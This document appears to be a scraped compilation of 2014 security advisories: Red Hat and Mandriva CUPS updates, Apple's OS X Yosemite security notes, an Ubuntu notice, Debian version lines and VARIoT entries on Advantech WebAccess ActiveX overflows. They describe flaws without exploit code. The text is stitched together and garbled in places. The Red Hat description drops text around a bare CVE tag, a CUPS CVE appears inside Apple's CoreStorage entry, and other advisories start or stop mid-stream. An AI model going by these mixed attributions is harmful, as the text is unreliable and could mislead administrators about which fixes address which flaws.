Updated cups packages that fix multiple security issues and several bugs
are now available for Red Hat Enterprise Linux 6.
Red Hat Product Security has rated this update as having Moderate security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64
Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux HPC Node (v. 6) - x86_64
Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
3. Description:
CUPS provides a portable printing layer for Linux, UNIX, and similar
operating systems. (CVE-2014-2856)
It was discovered that CUPS allowed certain users to create symbolic links
in certain directories under /var/cache/cups/. (CVE-2014-3537, CVE-2014-5029, CVE-2014-5030, CVE-2014-5031)
The CVE-2014-3537 issue was discovered by Francisco Alonso of Red Hat
Product Security.
These updated cups packages also include several bug fixes. Space precludes
documenting all of these changes in this advisory. Users are directed to
the Red Hat Enterprise Linux 6.6 Technical Notes, linked to in the
References section, for information on the most significant of these
changes.
All cups users are advised to upgrade to these updated packages, which
contain backported patches to correct these issues. After installing this
update, the cupsd daemon will be restarted automatically.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the
Red Hat Network to apply this update are available at
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
978387 - Bad IPP responses with version 2.0 (collection handling bug)
1012482 - /etc/cron.daily/cups breaks rule GEN003080 in Red Hat security guide
1087122 - CVE-2014-2856 cups: cross-site scripting flaw fixed in the 1.7.2 release
1115576 - CVE-2014-3537 cups: insufficient checking leads to privilege escalation
1122600 - CVE-2014-5029 cups: Incomplete fix for CVE-2014-3537
1128764 - CVE-2014-5030 cups: allows local users to read arbitrary files via a symlink attack
1128767 - CVE-2014-5031 cups: world-readable permissions
6. Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source:
cups-1.4.2-67.el6.src.rpm
i386:
cups-1.4.2-67.el6.i686.rpm
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-libs-1.4.2-67.el6.i686.rpm
cups-lpd-1.4.2-67.el6.i686.rpm
x86_64:
cups-1.4.2-67.el6.x86_64.rpm
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-debuginfo-1.4.2-67.el6.x86_64.rpm
cups-libs-1.4.2-67.el6.i686.rpm
cups-libs-1.4.2-67.el6.x86_64.rpm
cups-lpd-1.4.2-67.el6.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386:
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-devel-1.4.2-67.el6.i686.rpm
cups-php-1.4.2-67.el6.i686.rpm
x86_64:
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-debuginfo-1.4.2-67.el6.x86_64.rpm
cups-devel-1.4.2-67.el6.i686.rpm
cups-devel-1.4.2-67.el6.x86_64.rpm
cups-php-1.4.2-67.el6.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source:
cups-1.4.2-67.el6.src.rpm
x86_64:
cups-1.4.2-67.el6.x86_64.rpm
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-debuginfo-1.4.2-67.el6.x86_64.rpm
cups-libs-1.4.2-67.el6.i686.rpm
cups-libs-1.4.2-67.el6.x86_64.rpm
cups-lpd-1.4.2-67.el6.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64:
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-debuginfo-1.4.2-67.el6.x86_64.rpm
cups-devel-1.4.2-67.el6.i686.rpm
cups-devel-1.4.2-67.el6.x86_64.rpm
cups-php-1.4.2-67.el6.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source:
cups-1.4.2-67.el6.src.rpm
i386:
cups-1.4.2-67.el6.i686.rpm
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-devel-1.4.2-67.el6.i686.rpm
cups-libs-1.4.2-67.el6.i686.rpm
cups-lpd-1.4.2-67.el6.i686.rpm
ppc64:
cups-1.4.2-67.el6.ppc64.rpm
cups-debuginfo-1.4.2-67.el6.ppc.rpm
cups-debuginfo-1.4.2-67.el6.ppc64.rpm
cups-devel-1.4.2-67.el6.ppc.rpm
cups-devel-1.4.2-67.el6.ppc64.rpm
cups-libs-1.4.2-67.el6.ppc.rpm
cups-libs-1.4.2-67.el6.ppc64.rpm
cups-lpd-1.4.2-67.el6.ppc64.rpm
s390x:
cups-1.4.2-67.el6.s390x.rpm
cups-debuginfo-1.4.2-67.el6.s390.rpm
cups-debuginfo-1.4.2-67.el6.s390x.rpm
cups-devel-1.4.2-67.el6.s390.rpm
cups-devel-1.4.2-67.el6.s390x.rpm
cups-libs-1.4.2-67.el6.s390.rpm
cups-libs-1.4.2-67.el6.s390x.rpm
cups-lpd-1.4.2-67.el6.s390x.rpm
x86_64:
cups-1.4.2-67.el6.x86_64.rpm
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-debuginfo-1.4.2-67.el6.x86_64.rpm
cups-devel-1.4.2-67.el6.i686.rpm
cups-devel-1.4.2-67.el6.x86_64.rpm
cups-libs-1.4.2-67.el6.i686.rpm
cups-libs-1.4.2-67.el6.x86_64.rpm
cups-lpd-1.4.2-67.el6.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386:
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-php-1.4.2-67.el6.i686.rpm
ppc64:
cups-debuginfo-1.4.2-67.el6.ppc64.rpm
cups-php-1.4.2-67.el6.ppc64.rpm
s390x:
cups-debuginfo-1.4.2-67.el6.s390x.rpm
cups-php-1.4.2-67.el6.s390x.rpm
x86_64:
cups-debuginfo-1.4.2-67.el6.x86_64.rpm
cups-php-1.4.2-67.el6.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source:
cups-1.4.2-67.el6.src.rpm
i386:
cups-1.4.2-67.el6.i686.rpm
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-devel-1.4.2-67.el6.i686.rpm
cups-libs-1.4.2-67.el6.i686.rpm
cups-lpd-1.4.2-67.el6.i686.rpm
x86_64:
cups-1.4.2-67.el6.x86_64.rpm
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-debuginfo-1.4.2-67.el6.x86_64.rpm
cups-devel-1.4.2-67.el6.i686.rpm
cups-devel-1.4.2-67.el6.x86_64.rpm
cups-libs-1.4.2-67.el6.i686.rpm
cups-libs-1.4.2-67.el6.x86_64.rpm
cups-lpd-1.4.2-67.el6.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386:
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-php-1.4.2-67.el6.i686.rpm
x86_64:
cups-debuginfo-1.4.2-67.el6.x86_64.rpm
cups-php-1.4.2-67.el6.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2014-2856.html
https://www.redhat.com/security/data/cve/CVE-2014-3537.html
https://www.redhat.com/security/data/cve/CVE-2014-5029.html
https://www.redhat.com/security/data/cve/CVE-2014-5030.html
https://www.redhat.com/security/data/cve/CVE-2014-5031.html
https://access.redhat.com/security/updates/classification/#moderate
https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/6/html/6.6_Technical_Notes/cups.html#RHSA-2014-1388
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2014-10-16-1 OS X Yosemite v10.10
OS X Yosemite v10.10 is now available and addresses the following:
802.1X
Impact: An attacker can obtain WiFi credentials
Description: An attacker could have impersonated a WiFi access
point, offered to authenticate with LEAP, broken the MS-CHAPv1 hash,
and used the derived credentials to authenticate to the intended
access point even if that access point supported stronger
authentication methods. This issue was addressed by disabling LEAP by
default.
CVE-ID
CVE-2014-4364 : Pieter Robyns, Bram Bonne, Peter Quax, and Wim
Lamotte of Universiteit Hasselt
AFP File Server
Impact: A remote attacker could determine all the network addresses
of the system
Description: The AFP file server supported a command which returned
all the network addresses of the system. This issue was addressed by
removing the addresses from the result.
CVE-ID
CVE-2014-4426 : Craig Young of Tripwire VERT
apache
Impact: Multiple vulnerabilities in Apache
Description: Multiple vulnerabilities existed in Apache, the most
serious of which may lead to a denial of service. These issues were
addressed by updating Apache to version 2.4.9.
CVE-ID
CVE-2013-6438
CVE-2014-0098
App Sandbox
Impact: An application confined by sandbox restrictions may misuse
the accessibility API
Description: A sandboxed application could misuse the accessibility
API without the user's knowledge. This has been addressed by
requiring administrator approval to use the accessibility API on an
per-application basis.
CVE-ID
CVE-2014-4427 : Paul S. Ziegler of Reflare UG
Bash
Impact: In certain configurations, a remote attacker may be able to
execute arbitrary shell commands
Description: An issue existed in Bash's parsing of environment
variables. This issue was addressed through improved environment
variable parsing by better detecting the end of the function
statement. This update also incorporated the suggested CVE-2014-7169
change, which resets the parser state. In addition, this update
added a new namespace for exported functions by creating a function
decorator to prevent unintended header passthrough to Bash. The names
of all environment variables that introduce function definitions are
required to have a prefix "__BASH_FUNC<" and suffix ">()" to prevent
unintended function passing via HTTP headers.
CVE-ID
CVE-2014-6271 : Stephane Chazelas
CVE-2014-7169 : Tavis Ormandy
Bluetooth
Impact: A malicious Bluetooth input device may bypass pairing
Description: Unencrypted connections were permitted from Human
Interface Device-class Bluetooth Low Energy devices. If a Mac had
paired with such a device, an attacker could spoof the legitimate
device to establish a connection. The issue was addressed by denying
unencrypted HID connections.
CVE-ID
CVE-2014-4428 : Mike Ryan of iSEC Partners
CFPreferences
Impact: The 'require password after sleep or screen saver begins'
preference may not be respected until after a reboot
Description: A session management issue existed in the handling of
system preference settings. This issue was addressed through improved
session tracking.
CVE-ID
CVE-2014-4425
Certificate Trust Policy
Impact: Update to the certificate trust policy
Description: The certificate trust policy was updated. The complete
list of certificates may be viewed at
http://support.apple.com/kb/HT6005.
CoreStorage
Impact: An encrypted volume may stay unlocked when ejected
Description: When an encrypted volume was logically ejected while
mounted, the volume was unmounted but the keys were retained, so it
could have been mounted again without the password. This issue was
addressed by erasing the keys on eject.
CVE-ID
CVE-2014-4430 : Benjamin King at See Ben Click Computer Services LLC,
Karsten Iwen, Dustin Li (http://dustin.li/), Ken J.
CVE-ID
CVE-2014-3537
Dock
Impact: In some circumstances, windows may be visible even when the
screen is locked
Description: A state management issue existed in the handling of the
screen lock. This issue was addressed through improved state
tracking.
CVE-ID
CVE-2014-4431 : Emil Sjolander of Umea University
fdesetup
Impact: The fdesetup command may provide misleading status for the
state of encryption on disk
Description: After updating settings, but before rebooting, the
fdesetup command provided misleading status. This issue was addressed
through improved status reporting.
CVE-ID
CVE-2014-4432
iCloud Find My Mac
Impact: iCloud Lost mode PIN may be bruteforced
Description: A state persistence issue in rate limiting allowed
brute force attacks on iCloud Lost mode PIN. This issue was addressed
through improved state persistence across reboots.
CVE-ID
CVE-2014-4435 : knoy
IOAcceleratorFamily
Impact: An application may cause a denial of service
Description: A NULL pointer dereference was present in the
IntelAccelerator driver. The issue was addressed through improved
error handling.
CVE-ID
CVE-2014-4373 : cunzhang from Adlab of Venustech
IOHIDFamily
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A null pointer dereference existed in IOHIDFamily's
handling of key-mapping properties. This issue was addressed through
improved validation of IOHIDFamily key-mapping properties.
CVE-ID
CVE-2014-4405 : Ian Beer of Google Project Zero
IOHIDFamily
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A heap buffer overflow existed in IOHIDFamily's
handling of key-mapping properties. This issue was addressed through
improved bounds checking.
CVE-ID
CVE-2014-4404 : Ian Beer of Google Project Zero
IOHIDFamily
Impact: An application may cause a denial of service
Description: A out-of-bounds memory read was present in the
IOHIDFamily driver. The issue was addressed through improved input
validation.
CVE-ID
CVE-2014-4436 : cunzhang from Adlab of Venustech
IOHIDFamily
Impact: A user may be able to execute arbitrary code with system
privileges
Description: An out-of-bounds write issue exited in the IOHIDFamily
driver. The issue was addressed through improved input validation.
CVE-ID
CVE-2014-4380 : cunzhang from Adlab of Venustech
IOKit
Impact: A malicious application may be able to read uninitialized
data from kernel memory
Description: An uninitialized memory access issue existed in the
handling of IOKit functions. This issue was addressed through
improved memory initialization.
CVE-ID
CVE-2014-4407 : @PanguTeam
IOKit
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A validation issue existed in the handling of certain
metadata fields of IODataQueue objects. This issue was addressed
through improved validation of metadata.
CVE-ID
CVE-2014-4388 : @PanguTeam
IOKit
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A validation issue existed in the handling of certain
metadata fields of IODataQueue objects. This issue was addressed
through improved validation of metadata.
CVE-ID
CVE-2014-4418 : Ian Beer of Google Project Zero
Kernel
Impact: A local user may be able to determine kernel memory layout
Description: Multiple uninitialized memory issues existed in the
network statistics interface, which led to the disclosure of kernel
memory content. This issue was addressed through additional memory
initialization.
CVE-ID
CVE-2014-4371 : Fermin J. Serna of the Google Security Team
CVE-2014-4419 : Fermin J. Serna of the Google Security Team
CVE-2014-4420 : Fermin J. Serna of the Google Security Team
CVE-2014-4421 : Fermin J. Serna of the Google Security Team
Kernel
Impact: A maliciously crafted file system may cause unexpected
system shutdown or arbitrary code execution
Description: A heap-based buffer overflow issue existed in the
handling of HFS resource forks. A maliciously crafted filesystem may
cause an unexpected system shutdown or arbitrary code execution with
kernel privileges. The issue was addressed through improved bounds
checking.
CVE-ID
CVE-2014-4433 : Maksymilian Arciemowicz
Kernel
Impact: A malicious file system may cause unexpected system shutdown
Description: A NULL dereference issue existed in the handling of HFS
filenames. A maliciously crafted filesystem may cause an unexpected
system shutdown. This issue was addressed by avoiding the NULL
dereference.
CVE-ID
CVE-2014-4434 : Maksymilian Arciemowicz
Kernel
Impact: A local user may be able to cause an unexpected system
termination or arbitrary code execution in the kernel
Description: A double free issue existed in the handling of Mach
ports. This issue was addressed through improved validation of Mach
ports.
CVE-ID
CVE-2014-4375 : an anonymous researcher
Kernel
Impact: A person with a privileged network position may cause a
denial of service
Description: A race condition issue existed in the handling of IPv6
packets. This issue was addressed through improved lock state
checking.
CVE-ID
CVE-2011-2391 : Marc Heuse
Kernel
Impact: A local user may be able to cause an unexpected system
termination or arbitrary code execution in the kernel
Description: An out-of-bounds read issue existed in rt_setgate. This
may lead to memory disclosure or memory corruption. This issue was
addressed through improved bounds checking.
CVE-ID
CVE-2014-4408
Kernel
Impact: A local user can cause an unexpected system termination
Description: A reachable panic existed in the handling of messages
sent to system control sockets. This issue was addressed through
additional validation of messages.
CVE-ID
CVE-2014-4442 : Darius Davis of VMware
Kernel
Impact: Some kernel hardening measures may be bypassed
Description: The random number generator used for kernel hardening
measures early in the boot process was not cryptographically secure.
Some of its output was inferable from user space, allowing bypass of
the hardening measures. This issue was addressed by using a
cryptographically secure algorithm.
CVE-ID
CVE-2014-4422 : Tarjei Mandt of Azimuth Security
LaunchServices
Impact: A local application may bypass sandbox restrictions
Description: The LaunchServices interface for setting content type
handlers allowed sandboxed applications to specify handlers for
existing content types. A compromised application could use this to
bypass sandbox restrictions. The issue was addressed by restricting
sandboxed applications from specifying content type handlers.
CVE-ID
CVE-2014-4437 : Meder Kydyraliev of the Google Security Team
LoginWindow
Impact: Sometimes the screen might not lock
Description: A race condition existed in LoginWindow, which would
sometimes prevent the screen from locking. The issue was addressed by
changing the order of operations.
CVE-ID
CVE-2014-4438 : Harry Sintonen of nSense, Alessandro Lobina of
Helvetia Insurances, Patryk Szlagowski of Funky Monkey Labs
Mail
Impact: Mail may send email to unintended recipients
Description: A user interface inconsistency in Mail application
resulted in email being sent to addresses that were removed from the
list of recipients. The issue was addressed through improved user
interface consistency checks.
CVE-ID
CVE-2014-4439 : Patrick J Power of Melbourne, Australia
MCX Desktop Config Profiles
Impact: When mobile configuration profiles were uninstalled, their
settings were not removed
Description: Web proxy settings installed by a mobile configuration
profile were not removed when the profile was uninstalled. This issue
was addressed through improved handling of profile uninstallation.
CVE-ID
CVE-2014-4440 : Kevin Koster of Cloudpath Networks
NetFS Client Framework
Impact: File Sharing may enter a state in which it cannot be
disabled
Description: A state management issue existed in the File Sharing
framework. This issue was addressed through improved state
management.
CVE-ID
CVE-2014-4441 : Eduardo Bonsi of BEARTCOMMUNICATIONS
QuickTime
Impact: Playing a maliciously crafted m4a file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of audio
samples. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-4351 : Karl Smith of NCC Group
Safari
Impact: History of pages recently visited in an open tab may remain
after clearing of history
Description: Clearing Safari's history did not clear the
back/forward history for open tabs. This issue was addressed by
clearing the back/forward history.
CVE-ID
CVE-2013-5150
Safari
Impact: Opting in to push notifications from a maliciously crafted
website may cause future Safari Push Notifications to be missed
Description: An uncaught exception issue existed in
SafariNotificationAgent's handling of Safari Push Notifications. This
issue was addressed through improved handling of Safari Push
Notifications.
CVE-ID
CVE-2014-4417 : Marek Isalski of Faelix Limited
Secure Transport
Impact: An attacker may be able to decrypt data protected by SSL
Description: There are known attacks on the confidentiality of SSL
3.0 when a cipher suite uses a block cipher in CBC mode. An attacker
could force the use of SSL 3.0, even when the server would support a
better TLS version, by blocking TLS 1.0 and higher connection
attempts. This issue was addressed by disabling CBC cipher suites
when TLS connection attempts fail.
CVE-ID
CVE-2014-3566 : Bodo Moeller, Thai Duong, and Krzysztof Kotowicz of
Google Security Team
Security
Impact: A remote attacker may be able to cause a denial of service
Description: A null dereference existed in the handling of ASN.1
data. This issue was addressed through additional validation of ASN.1
data.
CVE-ID
CVE-2014-4443 : Coverity
Security
Impact: A local user might have access to another user's Kerberos
tickets
Description: A state management issue existed in SecurityAgent.
While Fast User Switching, sometimes a Kerberos ticket for the
switched-to user would be placed in the cache for the previous user.
This issue was addressed through improved state management.
CVE-ID
CVE-2014-4444 : Gary Simon of Sandia National Laboratories, Ragnar
Sundblad of KTH Royal Institute of Technology, Eugene Homyakov of
Kaspersky Lab
Security - Code Signing
Impact: Tampered applications may not be prevented from launching
Description: Apps signed on OS X prior to OS X Mavericks 10.9 or
apps using custom resource rules, may have been susceptible to
tampering that would not have invalidated the signature. On systems
set to allow only apps from the Mac App Store and identified
developers, a downloaded modified app could have been allowed to run
as though it were legitimate. This issue was addressed by ignoring
signatures of bundles with resource envelopes that omit resources
that may influence execution. OS X Mavericks v10.9.5 and Security
Update 2014-004 for OS X Mountain Lion v10.8.5 already contain these
changes.
CVE-ID
CVE-2014-4391 : Christopher Hickstein working with HP's Zero Day
Initiative
Note: OS X Yosemite includes Safari 8.0, which incorporates
the security content of Safari 7.1. For further details see
"About the security content of Safari 7.1" at
https://support.apple.com/kb/HT6440.
OS X Yosemite may be obtained from the Mac App Store.
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.22 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJUQCItAAoJEBcWfLTuOo7tVTMQAIpXH2MO4xElrJDdFvz+9hEq
0I/Md7JZMvm66AZZG6AlHPnGn/UfNSD6BxGmuuz2MnVyr3kBTHfGQbsRtoZ/54dZ
OJrFVD+HE+WmjhB2xLoLTMDP5QgdpBY0gpmNF5Ze4tRogpbfrhDQJjjWls4xbB3B
0MYF5Cq+9nMwHquh/gQpp4pRCms+S/3TdHrjunlfnWFJMNT+XTs0Y5+QPZQ8OMAb
lqDGjjjulN3+WLCekIWXX1WeAFjqW5ICSWqt0b8/yWVnLWuYmWvHPC8LrP52+s87
XHgx+9tW/5L+ZMGxfDYKnhkXNsQaFPai1iPgztjz7/c3NON7ogdIbJd290j2GZ2S
CUoozCx2rVn9l7hFYSDP5fHt8x1itvWeH1UX6WP6Ydkf4iXe63ksMaVSFqccEb7r
HlBlx/dE1FuWD+gkOQwDPkKZR1yiMArqrHz1YwC4GZ6/A3aG9B++y1TBCetQO8xs
bFmlhX4Rvmme+NED0Hli7yN/++axkYUfAHTLwnucq1MW+eP9jecsBpFsOMKJ0ika
XrZoquwIM4zQPgY1qBz15Nxeb8lX2IcpL5PKGEeqiKX3SRPerdQKUnUBk1DtHg2h
fl+BG2AfN6uaYGJvGL9G2OX95SylOWW9uoYvfTVafwU7f9tE8RUEStnXhQD00j/r
P2OKoqPuE6SsFq6L2VwF
=Ucxd
-----END PGP SIGNATURE-----
.
A malformed file with an invalid page header and compressed raster data
can trigger a buffer overflow in cupsRasterReadPixels (CVE-2014-9679).
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2856
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3537
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5029
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5030
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5031
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9679
http://advisories.mageia.org/MGASA-2014-0193.html
http://advisories.mageia.org/MGASA-2014-0313.html
http://advisories.mageia.org/MGASA-2015-0067.html
_______________________________________________________________________
Updated Packages:
Mandriva Business Server 2/X86_64:
0d1f31885b6c118b63449f2fdd821666 mbs2/x86_64/cups-1.7.0-8.1.mbs2.x86_64.rpm
b5337600a386f902763653796a2cefdf mbs2/x86_64/cups-common-1.7.0-8.1.mbs2.x86_64.rpm
7b1513d85b5f22cd90bed23a35e44f51 mbs2/x86_64/cups-filesystem-1.7.0-8.1.mbs2.noarch.rpm
c25fa9b9bba101274984fa2b7a62f7a3 mbs2/x86_64/lib64cups2-1.7.0-8.1.mbs2.x86_64.rpm
df24a6b84fdafffaadf961ab4aa3640b mbs2/x86_64/lib64cups2-devel-1.7.0-8.1.mbs2.x86_64.rpm
5c172624c992de8ebb2bf8a2b232ee3a mbs2/SRPMS/cups-1.7.0-8.1.mbs2.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
For the stable distribution (wheezy), these problems have been fixed in
version 1.5.3-5+deb7u4.
For the unstable distribution (sid), these problems have been fixed in
version 1.7.4-2. ============================================================================
Ubuntu Security Notice USN-2293-1
July 21, 2014
cups vulnerability
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
CUPS could be made to expose sensitive information, leading to privilege
escalation.
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 14.04 LTS:
cups 1.7.2-0ubuntu1.1
Ubuntu 12.04 LTS:
cups 1.5.3-0ubuntu8.4
Ubuntu 10.04 LTS:
cups 1.4.3-1ubuntu1.12
In general, a standard system update will make all the necessary changes
| VAR-201407-0233 | CVE-2014-2364 |
Advantech WebAccess Vulnerable to stack-based buffer overflow
Related entries in the VARIoT exploits database: VAR-E-201407-0126 |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the DVC.DvcCtrl ActiveX Control in dvs.ocx. The control does not check the length of an attacker-supplied string in the GetParameter method before copying it into a fixed length buffer on the stack. This allows an attacker to execute arbitrary code in the context of the browser process. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess webvact.ocx, dvs.ocx and webdact.ocx ActiveX controls fail to properly handle long-length named ProjectName, SetParameter, NodeName, CCDParameter, SetColor, AlarmImage, GetParameter, GetColor, ServerResponse, SetBaud and IPAddress parameters, and attackers can build malicious A WEB page that entice a user to access, can crash an application or execute arbitrary code. Advantech WebAccess is prone to multiple remote stack-based buffer-overflow vulnerabilities. Failed exploit attempts will likely cause a denial-of-service condition.
Advantech WebAccess 7.1 and prior are vulnerable
| VAR-201407-0234 | CVE-2014-2365 | Advantech WebAccess Remote code execution vulnerability |
CVSS V2: 5.5 CVSS V3: - Severity: MEDIUM |
Unspecified vulnerability in Advantech WebAccess before 7.2 allows remote authenticated users to create or delete arbitrary files via unknown vectors. Authentication is not required to exploit this vulnerability. The specific flaw exists within the gmicons.asp functionality. An attacker may leverage this to run arbitrary code in the context of the WebAccess service. WebAccess HMI/SCADA software provides remote control and management, allowing users to easily view and configure automation equipment in facility management systems, power stations and building automation systems. Advantech WebAccess is prone to a remote code-execution vulnerability. Failed exploit attempts will likely cause a denial-of-service condition.
Advantech WebAccess 7.1 and prior are vulnerable. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech. There are security vulnerabilities in Advantech WebAccess 7.1 and earlier versions
| VAR-201407-0237 | CVE-2014-2368 | Advantech WebAccess bwocxrun Unsafe ActiveX Control Information Disclosure Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: HIGH |
The BrowseFolder method in the bwocxrun ActiveX control in Advantech WebAccess before 7.2 allows remote attackers to read arbitrary files via a crafted call. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists with the bwocxrun ActiveX control, which allows for navigation from the network to the local file system. When combined with system settings and other components included as part of the installation, this allows for the activation of ActiveX controls resident on the local file system (even if not installed) without user interaction. An attacker can use this to install vulnerable controls on the target system. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess is prone to a remote security weakness. This may aid in further attacks.
Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. There is a security vulnerability in the 'BrowseFolder' method in the bwocxrun ActiveX control of Advantech WebAccess 7.1 and earlier